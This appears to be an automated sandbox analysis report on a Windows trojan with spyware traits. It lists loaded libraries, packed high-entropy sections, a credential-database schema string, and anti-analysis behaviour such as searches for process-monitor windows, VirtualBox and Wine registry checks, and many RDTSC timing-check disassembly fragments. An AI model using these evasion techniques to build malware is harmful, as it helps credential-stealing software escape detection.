Classification label: mal100.troj.spyw.evad.winEXE@1/0@5/1

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.2749157942.000000000559D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179616414.00000000055AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.0000000005590000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2749043787.00000000055AA000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static file information: File size 2972160 > 1048576

Source: file.exe

Static PE information: Raw size of tenlogwb is bigger than: 0x100000 < 0x2aa400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.3d0000.0.unpack :EW;.rsrc :W;.idata :W;tenlogwb:EW;zqaausgd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;tenlogwb:EW;zqaausgd:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x2dc2a9 should be: 0x2e21c3

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: tenlogwb
Source: file.exe	Static PE information: section name: zqaausgd
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E5B2BD push esi; retf	0_3_00E5B2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E5B2BD push esi; retf	0_3_00E5B2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E5AE3F push FFFFFFDBh; iretd	0_3_00E5AE50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E5AE3F push FFFFFFDBh; iretd	0_3_00E5AE50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E2B54F push ds; retf	0_3_00E2B550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E606D9 push eax; ret	0_3_00E60849
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E607A4 push eax; ret	0_3_00E60849
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05584237 push cs; iretd	0_3_05584238
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05584237 push cs; iretd	0_3_05584238
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_055891A6 push eax; ret	0_3_055891E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_055891A6 push eax; ret	0_3_055891E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E606D9 push eax; ret	0_3_00E60849
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E607A4 push eax; ret	0_3_00E60849
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05584237 push cs; iretd	0_3_05584238
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05584237 push cs; iretd	0_3_05584238
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_055891A6 push eax; ret	0_3_055891E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_055891A6 push eax; ret	0_3_055891E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E5B2BD push esi; retf	0_3_00E5B2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E5B2BD push esi; retf	0_3_00E5B2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E5AE3F push FFFFFFDBh; iretd	0_3_00E5AE50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E5AE3F push FFFFFFDBh; iretd	0_3_00E5AE50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E606D9 push eax; ret	0_3_00E60849
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00E607A4 push eax; ret	0_3_00E60849

Source: file.exe

Static PE information: section name: entropy: 7.968774204528531

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42F328 second address: 42F335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F02B8F275E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42F335 second address: 42F35A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F02B8F2D499h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42F35A second address: 42F364 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F02B8F275E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42F364 second address: 42F381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D499h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42F381 second address: 42F385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42F385 second address: 42EBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 cld 0x0000000a push dword ptr [ebp+122D0C69h] 0x00000010 mov dword ptr [ebp+122D1D2Fh], eax 0x00000016 call dword ptr [ebp+122D2ABDh] 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D2C9Bh], ecx 0x00000023 xor eax, eax 0x00000025 mov dword ptr [ebp+122D2C9Bh], edx 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f sub dword ptr [ebp+122D2C9Bh], ecx 0x00000035 mov dword ptr [ebp+122D3AC3h], eax 0x0000003b mov dword ptr [ebp+122D2C9Bh], eax 0x00000041 mov esi, 0000003Ch 0x00000046 xor dword ptr [ebp+122D2C9Bh], ecx 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 pushad 0x00000051 mov edx, dword ptr [ebp+122D3967h] 0x00000057 jmp 00007F02B8F2D490h 0x0000005c popad 0x0000005d lodsw 0x0000005f sub dword ptr [ebp+122D2C9Bh], esi 0x00000065 stc 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a pushad 0x0000006b pushad 0x0000006c mov edi, edx 0x0000006e sub dword ptr [ebp+122D2C9Bh], eax 0x00000074 popad 0x00000075 mov di, bx 0x00000078 popad 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d jc 00007F02B8F2D487h 0x00000083 stc 0x00000084 mov dword ptr [ebp+122D2C9Bh], ebx 0x0000008a push eax 0x0000008b pushad 0x0000008c push esi 0x0000008d push eax 0x0000008e push edx 0x0000008f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42EBEC second address: 42EC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F02B8F275F3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 42EC06 second address: 42EC0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AC2CD second address: 5AC306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F0h 0x00000007 jns 00007F02B8F275EAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 jnp 00007F02B8F275F2h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AC306 second address: 5AC31D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D493h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB311 second address: 5AB31B instructions: 0x00000000 rdtsc 0x00000002 je 00007F02B8F275E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB46E second address: 5AB48C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jno 00007F02B8F2D486h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jo 00007F02B8F2D486h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB48C second address: 5AB490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB5D4 second address: 5AB5DE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F02B8F2D486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB5DE second address: 5AB5E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB5E6 second address: 5AB5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB790 second address: 5AB7DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F02B8F275F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jne 00007F02B8F275E6h 0x00000012 jmp 00007F02B8F275F0h 0x00000017 pop edi 0x00000018 pushad 0x00000019 jmp 00007F02B8F275F3h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF8D2 second address: 5AF8FC instructions: 0x00000000 rdtsc 0x00000002 je 00007F02B8F2D496h 0x00000008 jmp 00007F02B8F2D490h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 je 00007F02B8F2D486h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AFBFC second address: 5AFC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F275F8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF209 second address: 5CF221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D494h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A3918 second address: 5A392C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F02B8F275ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A392C second address: 5A3930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CCF70 second address: 5CCF94 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F02B8F275E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c jmp 00007F02B8F275F0h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F02B8F275E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CD270 second address: 5CD27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F02B8F2D486h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CD27F second address: 5CD283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CD283 second address: 5CD287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CD287 second address: 5CD2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F275EEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CD3EB second address: 5CD3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CD3F5 second address: 5CD3F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB32 second address: 5CDB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F2D48Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB40 second address: 5CDB4E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F02B8F275E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB4E second address: 5CDB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB52 second address: 5CDB6E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F02B8F275F1h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB6E second address: 5CDB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CDB74 second address: 5CDB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007F02B8F275ECh 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CE034 second address: 5CE040 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007F02B8F2D486h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CE040 second address: 5CE07A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F02B8F275E6h 0x0000000b pop edx 0x0000000c push ebx 0x0000000d jmp 00007F02B8F275EBh 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jo 00007F02B8F275E6h 0x0000001d jmp 00007F02B8F275ECh 0x00000022 jno 00007F02B8F275E6h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CE07A second address: 5CE07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CE07E second address: 5CE087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CE992 second address: 5CE996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CE996 second address: 5CE99C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CE99C second address: 5CE9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02B8F2D497h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F02B8F2D48Ch 0x00000014 jnl 00007F02B8F2D49Ch 0x0000001a jmp 00007F02B8F2D496h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CED92 second address: 5CED98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CED98 second address: 5CEDA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF05D second address: 5CF063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF063 second address: 5CF067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF067 second address: 5CF06B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D39EB second address: 5D39EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D3DC8 second address: 5D3DD2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F02B8F275ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB2B0 second address: 5DB2BA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F02B8F2D48Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB2BA second address: 5DB2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007F02B8F275E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DA78F second address: 5DA7A0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F02B8F2D48Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DAF89 second address: 5DAF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DAF8D second address: 5DAFBB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F02B8F2D486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F02B8F2D48Bh 0x00000010 jmp 00007F02B8F2D497h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBAC4 second address: 5DBAE9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F02B8F275FAh 0x00000011 jmp 00007F02B8F275F4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBAE9 second address: 5DBB0B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jnc 00007F02B8F2D48Ah 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F02B8F2D488h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB0B second address: 5DBB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F275F1h 0x00000009 rdtsc
